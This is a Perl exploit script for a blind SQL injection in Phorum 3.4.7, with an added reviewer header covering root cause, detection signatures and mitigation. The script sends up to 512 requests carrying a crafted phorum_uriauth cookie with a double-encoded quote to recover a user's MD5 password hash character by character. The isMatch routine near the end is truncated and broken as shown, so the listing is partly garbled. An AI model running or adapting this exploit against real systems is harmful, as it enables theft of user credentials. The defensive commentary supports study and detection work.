#!/usr/bin/perl
#####################################################################################################
#
#   Sql injection exploit for Phorum 3.4.7
#
#   For details look at http://www.waraxe.us/index.php?modname=sa&id=19
#
#####################################################################################################
#
# Reviewer summary (defender's view)
# ----------------------------------
# What the script does: a boolean-based blind SQL injection carried in the
# `phorum_uriauth` cookie of a request to list.php. For each of 32 positions it
# tries the 16 lowercase hex digits, asking whether MID(password, pos, 1) equals
# the candidate, and reads the answer from the returned page. The recovered
# 32 characters are what the script labels "md5hash".
#
# Root cause as far as the payload shows: the quote is sent as `%2527`, i.e. a
# URL-encoded `%27`. Presumably the application URL-decodes the cookie value
# again after input escaping has run, so the quote reaches the SQL string
# unescaped -- confirm against the advisory linked above.
#
# Detection: Cookie headers containing `phorum_uriauth=` together with `%2527`,
# `MID(password` or a trailing `/*`; a burst of up to 512 (32 x 16) near-identical
# GET requests for list.php?f=1 from one client.
#
# Mitigation: build the auth query with bound parameters (or escape only after
# all decoding is done), treat cookie contents as untrusted input, and move to a
# Phorum release that addresses the advisory. The 32-hex-digit value suggests
# an unsalted MD5 password hash; a salted, slow password hash limits the value
# of a leaked column.
#
# Note: this listing was flattened and partly truncated by page extraction; see
# the comment on isMatch below.

$remote = 'localhost'; # hostname of the target
$port = 80; # port number, usually 80
$url = '/phorum347'; # path to Phorum, without ending "/"
$username = 'test'; # username whose info we will pull out
#----------------------------------------------------------------------------------------------------
use IO::Socket;

# Candidate characters: the lowercase hex alphabet.
@chars = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
$data = '';
$md5hash = '';
$url .= '/list.php?f=1';

# Outer loop: character position 1..32 of the password column.
for($nr=1;$nr<33;$nr++) {
    # Inner loop: one request per candidate hex digit.
    for($cnt=0;$cnt<16;$cnt++) {
        $charx = @chars[$cnt];
        # Cookie value = username, double-encoded quote (%2527), an AND condition
        # comparing one character of `password`, then `/*` (presumably to comment
        # out the remainder of the original query).
        $uriauth = "$username%2527%20AND%20MID(password," . $nr . ',1)=%2527' . $charx .'%2527/*';
        $cookie = "phorum_uriauth=$uriauth";
        $data = MakeGetRequest($remote, $url ,$cookie);
        $match = isMatch($data);
        $logline = "pos --> " . $nr . " ,char for test --> " . $charx . " --> " . $match;
        print $logline . "\n";
        if($match == 1) {
            # Condition held: record this character for the current position.
            $md5hash .= @chars[$cnt];
            $logline = "current md5hash --> " . $md5hash;
            print $logline . "\n";
            break;
        }
    }
}
$logline = "Final md5hash --> " . $md5hash;
print $logline . "\n";
exit();

# MakeGetRequest: opens a TCP connection and sends one HTTP/1.0 GET carrying the
# Cookie and Host headers, then returns everything read from the socket until
# EOF (status line, headers and body) as a single string.
# The arguments passed at the call site are not unpacked here; the sub reads the
# file-level globals $remote, $port, $url and $cookie.
# Dies if the connection cannot be established.
sub MakeGetRequest() {
    $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldnt connect to $remote:$port : $@\n";
    $str = "GET " . $url . " HTTP/1.0\r\n";
    print $socket $str;
    print $socket "Cookie: $cookie\r\n";
    print $socket "Host: $remote\r\n\r\n";
    $buff = "";
    while ($answer = <$socket>) { $buff .= $answer; }
    close($socket);
    return $buff;
}

# isMatch: looks for a marker substring in the response with index() and
# returns 1 when the test succeeds, 0 otherwise.
# NOTE(review): the marker string and the comparison that followed it are
# missing from this listing (apparently stripped as markup during extraction),
# so the line below is not valid Perl as shown and the exact success condition
# cannot be determined from this page.
sub isMatch($data) {
$idx1 = index($data," -1) { $bingo = 1; } else { $bingo = 0; } return $bingo; }